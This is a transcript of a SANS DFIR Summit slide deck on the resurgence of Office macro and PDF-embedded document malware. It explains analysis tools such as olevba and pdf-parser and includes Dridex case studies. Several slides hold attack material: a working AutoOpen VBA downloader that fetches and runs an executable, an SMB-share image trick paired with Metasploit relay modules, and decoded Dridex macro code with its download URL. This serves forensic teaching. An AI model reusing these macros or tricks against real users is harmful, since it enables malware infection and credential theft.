Back to the Future with Document Malware - SANS · Back to the Future with Document Malware SANS...
-
Upload
truongduong -
Category
Documents
-
view
230 -
download
5
Transcript of Back to the Future with Document Malware - SANS · Back to the Future with Document Malware SANS...
![Page 1: Back to the Future with Document Malware - SANS · Back to the Future with Document Malware SANS DFIR Summit ... Insert -> Object -> Text from File -> HTML file containing ... May](https://reader033.fdocuments.in/reader033/viewer/2022051509/5ade66fb7f8b9a213e8e0f22/html5/thumbnails/1.jpg)
© Fidelis Cybersecurity. All rights reserved.
Back to the Future with Document Malware SANS DFIR Summit
Tyler Halfpop
![Page 2: Back to the Future with Document Malware - SANS · Back to the Future with Document Malware SANS DFIR Summit ... Insert -> Object -> Text from File -> HTML file containing ... May](https://reader033.fdocuments.in/reader033/viewer/2022051509/5ade66fb7f8b9a213e8e0f22/html5/thumbnails/2.jpg)
THANK YOU!
![Page 3: Back to the Future with Document Malware - SANS · Back to the Future with Document Malware SANS DFIR Summit ... Insert -> Object -> Text from File -> HTML file containing ... May](https://reader033.fdocuments.in/reader033/viewer/2022051509/5ade66fb7f8b9a213e8e0f22/html5/thumbnails/3.jpg)
PS C:\> Get-Content TylerHalfpop
• Threat Researcher for Fidelis CyberSecurity
• Working on doctorate in computer science
• Adjunct instructor for Dakota State University
• SANS Lethal Forensicator
• Certifications – CISSP, GREM
• Site: tylerhalfpop.com | Twitter: @tylerhalfpop
© Fidelis Cybersecurity. All rights reserved. 2
![Page 4: Back to the Future with Document Malware - SANS · Back to the Future with Document Malware SANS DFIR Summit ... Insert -> Object -> Text from File -> HTML file containing ... May](https://reader033.fdocuments.in/reader033/viewer/2022051509/5ade66fb7f8b9a213e8e0f22/html5/thumbnails/4.jpg)
Eve -> Member of Hacking Group
© Fidelis Cybersecurity. All rights reserved. 3
![Page 5: Back to the Future with Document Malware - SANS · Back to the Future with Document Malware SANS DFIR Summit ... Insert -> Object -> Text from File -> HTML file containing ... May](https://reader033.fdocuments.in/reader033/viewer/2022051509/5ade66fb7f8b9a213e8e0f22/html5/thumbnails/5.jpg)
Alice -> Eve’s Boss
© Fidelis Cybersecurity. All rights reserved. 4
![Page 6: Back to the Future with Document Malware - SANS · Back to the Future with Document Malware SANS DFIR Summit ... Insert -> Object -> Text from File -> HTML file containing ... May](https://reader033.fdocuments.in/reader033/viewer/2022051509/5ade66fb7f8b9a213e8e0f22/html5/thumbnails/6.jpg)
Bob -> R&D @ Awesome Catnip Co.
© Fidelis Cybersecurity. All rights reserved. 5
![Page 7: Back to the Future with Document Malware - SANS · Back to the Future with Document Malware SANS DFIR Summit ... Insert -> Object -> Text from File -> HTML file containing ... May](https://reader033.fdocuments.in/reader033/viewer/2022051509/5ade66fb7f8b9a213e8e0f22/html5/thumbnails/7.jpg)
Bailey -> Bob’s Boss
© Fidelis Cybersecurity. All rights reserved. 6
![Page 8: Back to the Future with Document Malware - SANS · Back to the Future with Document Malware SANS DFIR Summit ... Insert -> Object -> Text from File -> HTML file containing ... May](https://reader033.fdocuments.in/reader033/viewer/2022051509/5ade66fb7f8b9a213e8e0f22/html5/thumbnails/8.jpg)
Billy – IR Fire Fighting Ninja
© Fidelis Cybersecurity. All rights reserved. 7
![Page 9: Back to the Future with Document Malware - SANS · Back to the Future with Document Malware SANS DFIR Summit ... Insert -> Object -> Text from File -> HTML file containing ... May](https://reader033.fdocuments.in/reader033/viewer/2022051509/5ade66fb7f8b9a213e8e0f22/html5/thumbnails/9.jpg)
Agenda
• History of Document Malware and the Recent
Resurgence
• Common Format Types Used
• Document Armor
• Tools
• Cases
• Conclusion
© Fidelis Cybersecurity. All rights reserved. 8
![Page 10: Back to the Future with Document Malware - SANS · Back to the Future with Document Malware SANS DFIR Summit ... Insert -> Object -> Text from File -> HTML file containing ... May](https://reader033.fdocuments.in/reader033/viewer/2022051509/5ade66fb7f8b9a213e8e0f22/html5/thumbnails/10.jpg)
History -> Winword.Concept 1995
• Word BASIC macro that
infected document template
files with non-malicious
spreading Macro
PayLoad
Sub MAIN
REM That’s enough to
prove my point
End Sub
© Fidelis Cybersecurity. All rights reserved. 9
![Page 11: Back to the Future with Document Malware - SANS · Back to the Future with Document Malware SANS DFIR Summit ... Insert -> Object -> Text from File -> HTML file containing ... May](https://reader033.fdocuments.in/reader033/viewer/2022051509/5ade66fb7f8b9a213e8e0f22/html5/thumbnails/11.jpg)
History -> Party like it’s 1999 Melissa
• Malicious Macro
spreads to contacts
• Large orgs had to such
down email servers
• 400-500k emails < 3
hours (Whalley, 1999)
© Fidelis Cybersecurity. All rights reserved. 10
(Whipple, n.d.)
![Page 12: Back to the Future with Document Malware - SANS · Back to the Future with Document Malware SANS DFIR Summit ... Insert -> Object -> Text from File -> HTML file containing ... May](https://reader033.fdocuments.in/reader033/viewer/2022051509/5ade66fb7f8b9a213e8e0f22/html5/thumbnails/12.jpg)
Document Malware Resurgence
“Last year, cybercriminals rediscovered the use of Office
macros to spread malware. Prevalent in the late 1990s,
macro viruses disappeared quickly when newer versions of
Microsoft Office had macros disabled by default. However,
malware authors have recently started to use social
engineering to trick users into enabling macros, thus
allowing the malicious code to be executed.”
(Grooten, 2015)
© Fidelis Cybersecurity. All rights reserved. 11
![Page 13: Back to the Future with Document Malware - SANS · Back to the Future with Document Malware SANS DFIR Summit ... Insert -> Object -> Text from File -> HTML file containing ... May](https://reader033.fdocuments.in/reader033/viewer/2022051509/5ade66fb7f8b9a213e8e0f22/html5/thumbnails/13.jpg)
History Graph • Microsoft Office Disabled
• Recent resurgence relies on social engineering
© Fidelis Cybersecurity. All rights reserved. 12
(Szappanos, 2014)
![Page 14: Back to the Future with Document Malware - SANS · Back to the Future with Document Malware SANS DFIR Summit ... Insert -> Object -> Text from File -> HTML file containing ... May](https://reader033.fdocuments.in/reader033/viewer/2022051509/5ade66fb7f8b9a213e8e0f22/html5/thumbnails/14.jpg)
Monthly Stats - Sophos
© Fidelis Cybersecurity. All rights reserved. 13
(Ducklin, 2015)
![Page 15: Back to the Future with Document Malware - SANS · Back to the Future with Document Malware SANS DFIR Summit ... Insert -> Object -> Text from File -> HTML file containing ... May](https://reader033.fdocuments.in/reader033/viewer/2022051509/5ade66fb7f8b9a213e8e0f22/html5/thumbnails/15.jpg)
Q1 2015 Macro Infections – TrendMicro
© Fidelis Cybersecurity. All rights reserved. 14
(Yaneza, 2015)
![Page 16: Back to the Future with Document Malware - SANS · Back to the Future with Document Malware SANS DFIR Summit ... Insert -> Object -> Text from File -> HTML file containing ... May](https://reader033.fdocuments.in/reader033/viewer/2022051509/5ade66fb7f8b9a213e8e0f22/html5/thumbnails/16.jpg)
Office Macro Security Warning
© Fidelis Cybersecurity. All rights reserved. 15
(Szappanos, 2014)
![Page 17: Back to the Future with Document Malware - SANS · Back to the Future with Document Malware SANS DFIR Summit ... Insert -> Object -> Text from File -> HTML file containing ... May](https://reader033.fdocuments.in/reader033/viewer/2022051509/5ade66fb7f8b9a213e8e0f22/html5/thumbnails/17.jpg)
Office Macro Security Warning
© Fidelis Cybersecurity. All rights reserved. 16
(Szappanos, 2014)
![Page 18: Back to the Future with Document Malware - SANS · Back to the Future with Document Malware SANS DFIR Summit ... Insert -> Object -> Text from File -> HTML file containing ... May](https://reader033.fdocuments.in/reader033/viewer/2022051509/5ade66fb7f8b9a213e8e0f22/html5/thumbnails/18.jpg)
Office Macro Security Warning
© Fidelis Cybersecurity. All rights reserved. 17
(Szappanos, 2014)
![Page 19: Back to the Future with Document Malware - SANS · Back to the Future with Document Malware SANS DFIR Summit ... Insert -> Object -> Text from File -> HTML file containing ... May](https://reader033.fdocuments.in/reader033/viewer/2022051509/5ade66fb7f8b9a213e8e0f22/html5/thumbnails/19.jpg)
Office Macro Security Warning
© Fidelis Cybersecurity. All rights reserved. 18
(Szappanos, 2014)
![Page 20: Back to the Future with Document Malware - SANS · Back to the Future with Document Malware SANS DFIR Summit ... Insert -> Object -> Text from File -> HTML file containing ... May](https://reader033.fdocuments.in/reader033/viewer/2022051509/5ade66fb7f8b9a213e8e0f22/html5/thumbnails/20.jpg)
Office Macro Security Warning
© Fidelis Cybersecurity. All rights reserved. 19
(Szappanos, 2014)
![Page 21: Back to the Future with Document Malware - SANS · Back to the Future with Document Malware SANS DFIR Summit ... Insert -> Object -> Text from File -> HTML file containing ... May](https://reader033.fdocuments.in/reader033/viewer/2022051509/5ade66fb7f8b9a213e8e0f22/html5/thumbnails/21.jpg)
© Fidelis Cybersecurity. All rights reserved. 20
(Talampas, 2015)
![Page 22: Back to the Future with Document Malware - SANS · Back to the Future with Document Malware SANS DFIR Summit ... Insert -> Object -> Text from File -> HTML file containing ... May](https://reader033.fdocuments.in/reader033/viewer/2022051509/5ade66fb7f8b9a213e8e0f22/html5/thumbnails/22.jpg)
© Fidelis Cybersecurity. All rights reserved. 21
![Page 23: Back to the Future with Document Malware - SANS · Back to the Future with Document Malware SANS DFIR Summit ... Insert -> Object -> Text from File -> HTML file containing ... May](https://reader033.fdocuments.in/reader033/viewer/2022051509/5ade66fb7f8b9a213e8e0f22/html5/thumbnails/23.jpg)
Office Formats
• OLE2 - Object Linking and Embedding (OLE) Compound File format
• 1997-2003
• FAT format
• XML - Office Open XML (OOXML)
• .*x files
• ZIP archive with XML files
• XML 2003 - Office XML
• Single .xml file
• MHTML
• Single File Web Page
• RTF
• Rich Text Format
• Embedding doc files
© Fidelis Cybersecurity. All rights reserved. 22
![Page 24: Back to the Future with Document Malware - SANS · Back to the Future with Document Malware SANS DFIR Summit ... Insert -> Object -> Text from File -> HTML file containing ... May](https://reader033.fdocuments.in/reader033/viewer/2022051509/5ade66fb7f8b9a213e8e0f22/html5/thumbnails/24.jpg)
Downloader Types - Sophos
© Fidelis Cybersecurity. All rights reserved. 23
(Chantry, 2015)
![Page 25: Back to the Future with Document Malware - SANS · Back to the Future with Document Malware SANS DFIR Summit ... Insert -> Object -> Text from File -> HTML file containing ... May](https://reader033.fdocuments.in/reader033/viewer/2022051509/5ade66fb7f8b9a213e8e0f22/html5/thumbnails/25.jpg)
Auto Macros
Excel:
Sub Auto_Open()
End Sub
Sub Workbook_Open()
End Sub
Word:
Sub AutoOpen()
Auto_Open
End Sub
© Fidelis Cybersecurity. All rights reserved. 24
![Page 26: Back to the Future with Document Malware - SANS · Back to the Future with Document Malware SANS DFIR Summit ... Insert -> Object -> Text from File -> HTML file containing ... May](https://reader033.fdocuments.in/reader033/viewer/2022051509/5ade66fb7f8b9a213e8e0f22/html5/thumbnails/26.jpg)
Downloader Common Actions
1. URLDownloadToFile()
2. XMLHTTP object open method
© Fidelis Cybersecurity. All rights reserved. 25
![Page 27: Back to the Future with Document Malware - SANS · Back to the Future with Document Malware SANS DFIR Summit ... Insert -> Object -> Text from File -> HTML file containing ... May](https://reader033.fdocuments.in/reader033/viewer/2022051509/5ade66fb7f8b9a213e8e0f22/html5/thumbnails/27.jpg)
Deobfuscated Downloaders
© Fidelis Cybersecurity. All rights reserved. 26
(Chantry, 2015)
![Page 28: Back to the Future with Document Malware - SANS · Back to the Future with Document Malware SANS DFIR Summit ... Insert -> Object -> Text from File -> HTML file containing ... May](https://reader033.fdocuments.in/reader033/viewer/2022051509/5ade66fb7f8b9a213e8e0f22/html5/thumbnails/28.jpg)
Simple Macro
Word Doc with Macro Sub AutoOpen() Dim xHttp: Set xHttp = CreateObject("Microsoft.XMLHTTP") Dim bStrm: Set bStrm = CreateObject("Adodb.Stream") xHttp.Open "GET", "http://192.168.66.254/bad.exe", False xHttp.Send With bStrm Type = 1 Open write xHttp.responseBody savetofile "bad.exe", 2 End With Shell ("bad.exe") End Sub
© Fidelis Cybersecurity. All rights reserved. 27
![Page 29: Back to the Future with Document Malware - SANS · Back to the Future with Document Malware SANS DFIR Summit ... Insert -> Object -> Text from File -> HTML file containing ... May](https://reader033.fdocuments.in/reader033/viewer/2022051509/5ade66fb7f8b9a213e8e0f22/html5/thumbnails/29.jpg)
© Fidelis Cybersecurity. All rights reserved. 28
![Page 30: Back to the Future with Document Malware - SANS · Back to the Future with Document Malware SANS DFIR Summit ... Insert -> Object -> Text from File -> HTML file containing ... May](https://reader033.fdocuments.in/reader033/viewer/2022051509/5ade66fb7f8b9a213e8e0f22/html5/thumbnails/30.jpg)
Obfuscation
© Fidelis Cybersecurity. All rights reserved. 29
(Ristow, 2015)
![Page 31: Back to the Future with Document Malware - SANS · Back to the Future with Document Malware SANS DFIR Summit ... Insert -> Object -> Text from File -> HTML file containing ... May](https://reader033.fdocuments.in/reader033/viewer/2022051509/5ade66fb7f8b9a213e8e0f22/html5/thumbnails/31.jpg)
30 (Ristow, 2015)
![Page 32: Back to the Future with Document Malware - SANS · Back to the Future with Document Malware SANS DFIR Summit ... Insert -> Object -> Text from File -> HTML file containing ... May](https://reader033.fdocuments.in/reader033/viewer/2022051509/5ade66fb7f8b9a213e8e0f22/html5/thumbnails/32.jpg)
© Fidelis Cybersecurity. All rights reserved. 31 (Ristow, 2015)
![Page 33: Back to the Future with Document Malware - SANS · Back to the Future with Document Malware SANS DFIR Summit ... Insert -> Object -> Text from File -> HTML file containing ... May](https://reader033.fdocuments.in/reader033/viewer/2022051509/5ade66fb7f8b9a213e8e0f22/html5/thumbnails/33.jpg)
Deobfuscation
• Rename variables in a text editor using find/replace
• Decode string camouflaging operations
© Fidelis Cybersecurity. All rights reserved. 32
![Page 34: Back to the Future with Document Malware - SANS · Back to the Future with Document Malware SANS DFIR Summit ... Insert -> Object -> Text from File -> HTML file containing ... May](https://reader033.fdocuments.in/reader033/viewer/2022051509/5ade66fb7f8b9a213e8e0f22/html5/thumbnails/34.jpg)
Password Protected Macros
• Re-save XML formatted Office file as the older OLE
format
(docx, xlsx, pptx) -> (doc, xls, ppt)
© Fidelis Cybersecurity. All rights reserved. 33
![Page 35: Back to the Future with Document Malware - SANS · Back to the Future with Document Malware SANS DFIR Summit ... Insert -> Object -> Text from File -> HTML file containing ... May](https://reader033.fdocuments.in/reader033/viewer/2022051509/5ade66fb7f8b9a213e8e0f22/html5/thumbnails/35.jpg)
Password Protected Macros
• Find DPB=“.” string in a hex editor and replace it the
bytes below to change the macro password to
“password”
44 50 42 3D 22 35 45 35 43 46 32 32 37 30 45 37
39 32 30 39 36 32 30 39 36 44 46 36 41 32 31 39
36 42 37 46 38 44 31 36 33 45 42 45 32 42 41 31
34 44 32 36 31 36 30 46 33 35 36 41 32 43 33 34
39 31 39 44 36 41 30 36 46 35 42 35 46 39 34 30
38 45 36 22
© Fidelis Cybersecurity. All rights reserved. 34
![Page 36: Back to the Future with Document Malware - SANS · Back to the Future with Document Malware SANS DFIR Summit ... Insert -> Object -> Text from File -> HTML file containing ... May](https://reader033.fdocuments.in/reader033/viewer/2022051509/5ade66fb7f8b9a213e8e0f22/html5/thumbnails/36.jpg)
Password Protected Macros
© Fidelis Cybersecurity. All rights reserved. 35
![Page 37: Back to the Future with Document Malware - SANS · Back to the Future with Document Malware SANS DFIR Summit ... Insert -> Object -> Text from File -> HTML file containing ... May](https://reader033.fdocuments.in/reader033/viewer/2022051509/5ade66fb7f8b9a213e8e0f22/html5/thumbnails/37.jpg)
Password Protected Macros
© Fidelis Cybersecurity. All rights reserved. 36
![Page 38: Back to the Future with Document Malware - SANS · Back to the Future with Document Malware SANS DFIR Summit ... Insert -> Object -> Text from File -> HTML file containing ... May](https://reader033.fdocuments.in/reader033/viewer/2022051509/5ade66fb7f8b9a213e8e0f22/html5/thumbnails/38.jpg)
Password Protected Macros
© Fidelis Cybersecurity. All rights reserved. 37
![Page 39: Back to the Future with Document Malware - SANS · Back to the Future with Document Malware SANS DFIR Summit ... Insert -> Object -> Text from File -> HTML file containing ... May](https://reader033.fdocuments.in/reader033/viewer/2022051509/5ade66fb7f8b9a213e8e0f22/html5/thumbnails/39.jpg)
© Fidelis Cybersecurity. All rights reserved. 38
![Page 40: Back to the Future with Document Malware - SANS · Back to the Future with Document Malware SANS DFIR Summit ... Insert -> Object -> Text from File -> HTML file containing ... May](https://reader033.fdocuments.in/reader033/viewer/2022051509/5ade66fb7f8b9a213e8e0f22/html5/thumbnails/40.jpg)
Password Protected Macros
© Fidelis Cybersecurity. All rights reserved. 39
![Page 41: Back to the Future with Document Malware - SANS · Back to the Future with Document Malware SANS DFIR Summit ... Insert -> Object -> Text from File -> HTML file containing ... May](https://reader033.fdocuments.in/reader033/viewer/2022051509/5ade66fb7f8b9a213e8e0f22/html5/thumbnails/41.jpg)
VBA Downloaders Used By
• Dridex
• Vawtrak
• Dyreza
• Cryptowall
© Fidelis Cybersecurity. All rights reserved. 40
![Page 42: Back to the Future with Document Malware - SANS · Back to the Future with Document Malware SANS DFIR Summit ... Insert -> Object -> Text from File -> HTML file containing ... May](https://reader033.fdocuments.in/reader033/viewer/2022051509/5ade66fb7f8b9a213e8e0f22/html5/thumbnails/42.jpg)
Word Doc with a Network Share Link
Insert -> Object -> Text from File -> HTML file containing
<html><body><img src="\\192.168.66.200\share\oops.jpg"
width=1 height=1></body><html>
capture/server/smb or
exploit/windows/exploit/smb/smb_relay modules
© Fidelis Cybersecurity. All rights reserved. 41
![Page 43: Back to the Future with Document Malware - SANS · Back to the Future with Document Malware SANS DFIR Summit ... Insert -> Object -> Text from File -> HTML file containing ... May](https://reader033.fdocuments.in/reader033/viewer/2022051509/5ade66fb7f8b9a213e8e0f22/html5/thumbnails/43.jpg)
© Fidelis Cybersecurity. All rights reserved. 42
![Page 44: Back to the Future with Document Malware - SANS · Back to the Future with Document Malware SANS DFIR Summit ... Insert -> Object -> Text from File -> HTML file containing ... May](https://reader033.fdocuments.in/reader033/viewer/2022051509/5ade66fb7f8b9a213e8e0f22/html5/thumbnails/44.jpg)
Bartalex
© Fidelis Cybersecurity. All rights reserved. 43
(Talampas, 2015)
![Page 45: Back to the Future with Document Malware - SANS · Back to the Future with Document Malware SANS DFIR Summit ... Insert -> Object -> Text from File -> HTML file containing ... May](https://reader033.fdocuments.in/reader033/viewer/2022051509/5ade66fb7f8b9a213e8e0f22/html5/thumbnails/45.jpg)
Bartalex
44 (Talampas, 2015)
![Page 46: Back to the Future with Document Malware - SANS · Back to the Future with Document Malware SANS DFIR Summit ... Insert -> Object -> Text from File -> HTML file containing ... May](https://reader033.fdocuments.in/reader033/viewer/2022051509/5ade66fb7f8b9a213e8e0f22/html5/thumbnails/46.jpg)
Dridex
• Tools
• Pdfid & pdf-parser
(Stevens, 2015)
• Olevba (Decalge, 2015)
© Fidelis Cybersecurity. All rights reserved. 45
(Levene & Downs, 2015)
(Inocencio, 2014)
![Page 47: Back to the Future with Document Malware - SANS · Back to the Future with Document Malware SANS DFIR Summit ... Insert -> Object -> Text from File -> HTML file containing ... May](https://reader033.fdocuments.in/reader033/viewer/2022051509/5ade66fb7f8b9a213e8e0f22/html5/thumbnails/47.jpg)
PDFID
pdfid hmm.pdf
PDFiD 0.2.1 hmm.pdf
PDF Header: %PDF-1.4
obj 12
endobj 12
stream 2
endstream 2
xref 1
trailer 1
startxref 1
/Page 1
/Encrypt 0
/ObjStm 0
/JS 1
/JavaScript 2
/AA 0
/OpenAction 0
/AcroForm 0
/JBIG2Decode 0
/RichMedia 0
/Launch 0
/EmbeddedFile 1
/XFA 0
/Colors > 2^24 0
© Fidelis Cybersecurity. All rights reserved. 46
PDF Document -> Word Doc -> Macro
0c044fd59cc6ccc28a48937bc69cc0c4)
(Stevens, 2015)
![Page 48: Back to the Future with Document Malware - SANS · Back to the Future with Document Malware SANS DFIR Summit ... Insert -> Object -> Text from File -> HTML file containing ... May](https://reader033.fdocuments.in/reader033/viewer/2022051509/5ade66fb7f8b9a213e8e0f22/html5/thumbnails/48.jpg)
PDF-Parser
pdf-parser hmm.pdf
obj 3 0
Type:
Referencing:
<<
/S /JavaScript
/JS '(var z =
this.dataObjects;\\r\\n
this.exportDataObject\\({cName:z
[0].name, nLaunch:2}\\);)'
>>
obj 2 0
Type: /Filespec
Referencing: 1 0 R, 1 0 R
<<
/Type /Filespec
/F (2.docm)
/UF (2.docm)
/EF
<<
/F 1 0 R
/UF 1 0 R
>>
>>
obj 1 0
Type: /EmbeddedFile
Referencing:
Contains stream
<<
/Length 42719
/Type /EmbeddedFile
/Filter /FlateDecode
/Params
<<
/ModDate "(D:20150811105028+03'00')"
/Size 45430
>>
>>
© Fidelis Cybersecurity. All rights reserved. 47
![Page 49: Back to the Future with Document Malware - SANS · Back to the Future with Document Malware SANS DFIR Summit ... Insert -> Object -> Text from File -> HTML file containing ... May](https://reader033.fdocuments.in/reader033/viewer/2022051509/5ade66fb7f8b9a213e8e0f22/html5/thumbnails/49.jpg)
PDF-Parser
pdf-parser -o 1 -f -d 2.docm hmm.pdf
obj 1 0
Type: /EmbeddedFile
Referencing:
Contains stream
<<
/Length 42719
/Type /EmbeddedFile
/Filter /FlateDecode
/Params
<<
/ModDate "(D:20150811105028+03'00')"
/Size 45430
>>
>>
© Fidelis Cybersecurity. All rights reserved. 48
![Page 50: Back to the Future with Document Malware - SANS · Back to the Future with Document Malware SANS DFIR Summit ... Insert -> Object -> Text from File -> HTML file containing ... May](https://reader033.fdocuments.in/reader033/viewer/2022051509/5ade66fb7f8b9a213e8e0f22/html5/thumbnails/50.jpg)
OLEvba
olevba.py 2.docm
olevba 0.40 - http://decalage.info/python/oletools
Flags Filename
----------- -----------------------------------------------------------------
OpX:MASIH--V 2.docm
(Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, V=VBA strings, ?=Unknown)
===============================================================================
FILE: 2.docm
Type: OpenXML
-------------------------------------------------------------------------------
VBA MACRO ThisDocument.cls
in file: word/vbaProject.bin - OLE stream: u'VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
© Fidelis Cybersecurity. All rights reserved. 49
![Page 51: Back to the Future with Document Malware - SANS · Back to the Future with Document Malware SANS DFIR Summit ... Insert -> Object -> Text from File -> HTML file containing ... May](https://reader033.fdocuments.in/reader033/viewer/2022051509/5ade66fb7f8b9a213e8e0f22/html5/thumbnails/51.jpg)
OLEvba
Sub autoopen() VEeve (8.2) End Sub Sub VEeve(FFFFF As Long) FBFILE_FORMAT_1 End Sub Public Function FBFILE_FORMAT_1() Set pathIsAbsolute_1 = hCurDir_2(Chr(87) & Chr(60) & Chr(83) & Chr(99) & Chr(61) & Chr(114) & Chr(105) & Chr(112) & Chr(116) & ";" & Chr(46) & Chr(83) & Chr(61) & Chr(104) & Chr(101) & "<" & Chr(108) & Chr(108)).Environment(Chr(80) & Chr(114) & "o" & Chr(99) & Chr(101) & "s" & "s") pathIsAbsolute_2 = pathIsAbsolute_1("T" & Chr(69) & Chr(77) & Chr(80)) Dim pathIsAbsolute_4 As Object Set pathIsAbsolute_4 = hCurDir_2(Chr(65) & "<" & "d" & Chr(111) & Chr(59) & Chr(100) & Chr(98) & Chr(61) & Chr(46) & Chr(83) & Chr(116) & Chr(61) & Chr(114) & Chr(60) & Chr(101) & "a" & Chr(59) & Chr(109)) Dim pathIsAbsolute_3 As String pathIsAbsolute_3 = pathIsAbsolute_2 + "\ce" & Chr(101) + "ce." & "e" & Chr(120) & Chr(101) With pathIsAbsolute_4 .Type = 1 .Open .write usZ5pw3gU8(223) End With …
© Fidelis Cybersecurity. All rights reserved. 50
![Page 52: Back to the Future with Document Malware - SANS · Back to the Future with Document Malware SANS DFIR Summit ... Insert -> Object -> Text from File -> HTML file containing ... May](https://reader033.fdocuments.in/reader033/viewer/2022051509/5ade66fb7f8b9a213e8e0f22/html5/thumbnails/52.jpg)
OLEvba
+------------+----------------------+-----------------------------------------+
| Type | Keyword | Description |
+------------+----------------------+-----------------------------------------+
| AutoExec | AutoOpen | Runs when the Word document is opened |
| Suspicious | Open | May open a file |
| Suspicious | CreateObject | May create an OLE object |
| Suspicious | Chr | May attempt to obfuscate specific |
| | | strings |
| Suspicious | SaveToFile | May create a text file |
| Suspicious | Write | May write to a file (if combined with |
| | | Open) |
| Suspicious | Hex Strings | Hex-encoded strings were detected, may |
| | | be used to obfuscate strings (option |
| | | --decode to see all) |
| Suspicious | VBA obfuscated | VBA string expressions were detected, |
| | Strings | may be used to obfuscate strings |
| | | (option --decode to see all) |
| IOC | http://mpaya.art.br/ | URL (obfuscation: VBA expression) |
| | 334f3d/096uh5b.exe | |
© Fidelis Cybersecurity. All rights reserved. 51
![Page 53: Back to the Future with Document Malware - SANS · Back to the Future with Document Malware SANS DFIR Summit ... Insert -> Object -> Text from File -> HTML file containing ... May](https://reader033.fdocuments.in/reader033/viewer/2022051509/5ade66fb7f8b9a213e8e0f22/html5/thumbnails/53.jpg)
OLEvba
| IOC | ceece.exe | Executable file name (obfuscation: VBA |
| | | expression) |
| IOC | 096uh5b.exe | Executable file name (obfuscation: VBA |
| | | expression) |
| VBA string | W<Sc=ript;.S=he<ll | (Chr(87) & Chr(60) & Chr(83) & Chr(99) |
| | | & Chr(61) & Chr(114) & Chr(105) & |
| | | Chr(112) & Chr(116) & ";" & Chr(46) & |
| | | Chr(83) & Chr(61) & Chr(104) & Chr(101) |
| | | & "<" & Chr(108) & Chr(108)) |
| VBA string | Process | (Chr(80) & Chr(114) & "o" & Chr(99) & |
| | | Chr(101) & "s" & "s") |
| VBA string | TEMP | ("T" & Chr(69) & Chr(77) & Chr(80)) |
| VBA string | A<do;db=.St=r<ea;m | (Chr(65) & "<" & "d" & Chr(111) & |
| | | Chr(59) & Chr(100) & Chr(98) & Chr(61) |
| | | & Chr(46) & Chr(83) & Chr(116) & |
| | | Chr(61) & Chr(114) & Chr(60) & Chr(101) |
| | | & "a" & Chr(59) & Chr(109)) |
| VBA string | \ceece.exe | "\ce" & Chr(101) + "ce." & "e" & |
| | | Chr(120) & Chr(101) |
© Fidelis Cybersecurity. All rights reserved. 52
![Page 54: Back to the Future with Document Malware - SANS · Back to the Future with Document Malware SANS DFIR Summit ... Insert -> Object -> Text from File -> HTML file containing ... May](https://reader033.fdocuments.in/reader033/viewer/2022051509/5ade66fb7f8b9a213e8e0f22/html5/thumbnails/54.jpg)
OLEvba
| VBA string | S=<hel;l<.Ap;pli<cat | (Chr(83) & Chr(61) & "<" & "h" & "e" & |
| | =ion | Chr(108) & Chr(59) & Chr(108) & "<" & |
| | | Chr(46) & Chr(65) & "p;" & Chr(112) & |
| | | Chr(108) & Chr(105) & "<" & Chr(99) & |
| | | Chr(97) & Chr(116) & Chr(61) & Chr(105) |
| | | & Chr(111) & Chr(110)) |
| VBA string | Mi<cro=soft;.XM<L;HT | (Chr(77) & Chr(105) & Chr(60) & "c" & |
| | =TP | Chr(114) & Chr(111) & Chr(61) & |
| | | Chr(115) & Chr(111) & Chr(102) & "t" & |
| | | Chr(59) & Chr(46) & Chr(88) & "M" & |
| | | Chr(60) & Chr(76) & ";" & "H" & Chr(84) |
| | | & "=" & Chr(84) & "P") |
| VBA string | GET | Chr(71) & Chr(69) & Chr(84) |
© Fidelis Cybersecurity. All rights reserved. 53
![Page 55: Back to the Future with Document Malware - SANS · Back to the Future with Document Malware SANS DFIR Summit ... Insert -> Object -> Text from File -> HTML file containing ... May](https://reader033.fdocuments.in/reader033/viewer/2022051509/5ade66fb7f8b9a213e8e0f22/html5/thumbnails/55.jpg)
OLEvba
| VBA string | http://mpaya.art.br/ | Chr(104) & Chr(116) & "t" & Chr(112) & |
| | 334f3d/096uh5b.exe | Chr(58) & "/" & "/" & Chr(109) & |
| | | Chr(112) & Chr(97) & Chr(121) & Chr(97) |
| | | & Chr(46) & Chr(97) & Chr(114) & |
| | | Chr(116) & Chr(46) & Chr(98) & Chr(114) |
| | | & Chr(47) & "3" & Chr(51) & Chr(52) & |
| | | "f" & Chr(51) & Chr(100) & Chr(47) & |
| | | Chr(48) & Chr(57) & Chr(54) & Chr(117) |
| | | & Chr(104) & Chr(53) & Chr(98) & |
| | | Chr(46) & "e" & Chr(120) & "e" |
| VBA string | < | Chr(60) |
| VBA string | = | Chr(61) |
| VBA string | ; | Chr(59) |
+------------+----------------------+-----------------------------------------+
© Fidelis Cybersecurity. All rights reserved. 54
![Page 56: Back to the Future with Document Malware - SANS · Back to the Future with Document Malware SANS DFIR Summit ... Insert -> Object -> Text from File -> HTML file containing ... May](https://reader033.fdocuments.in/reader033/viewer/2022051509/5ade66fb7f8b9a213e8e0f22/html5/thumbnails/56.jpg)
Recent Dridex
olevba.py dridex.doc
olevba 0.40 - http://decalage.info/python/oletools
Flags Filename
----------- -----------------------------------------------------------------
OLE:MASI-B-V dridex.doc
(Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, V=VBA strings, ?=Unknown)
===============================================================================
FILE: dridex.doc
Type: OLE
-------------------------------------------------------------------------------
VBA MACRO ThisDocument.cls
in file: dridex.doc - OLE stream: u'Macros/VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Sub autoopen()
SSVEvdqwfF3 (7.4)
End Sub
Sub SSVEvdqwfF3(FFFFF As Double)
vtkNormalizeFileToFile
End Sub
© Fidelis Cybersecurity. All rights reserved. 55
![Page 57: Back to the Future with Document Malware - SANS · Back to the Future with Document Malware SANS DFIR Summit ... Insert -> Object -> Text from File -> HTML file containing ... May](https://reader033.fdocuments.in/reader033/viewer/2022051509/5ade66fb7f8b9a213e8e0f22/html5/thumbnails/57.jpg)
+------------+----------------------+-----------------------------------------+
| Type | Keyword | Description |
+------------+----------------------+-----------------------------------------+
| AutoExec | AutoOpen | Runs when the Word document is opened |
| AutoExec | AutoClose | Runs when the Word document is closed |
| Suspicious | Kill | May delete a file |
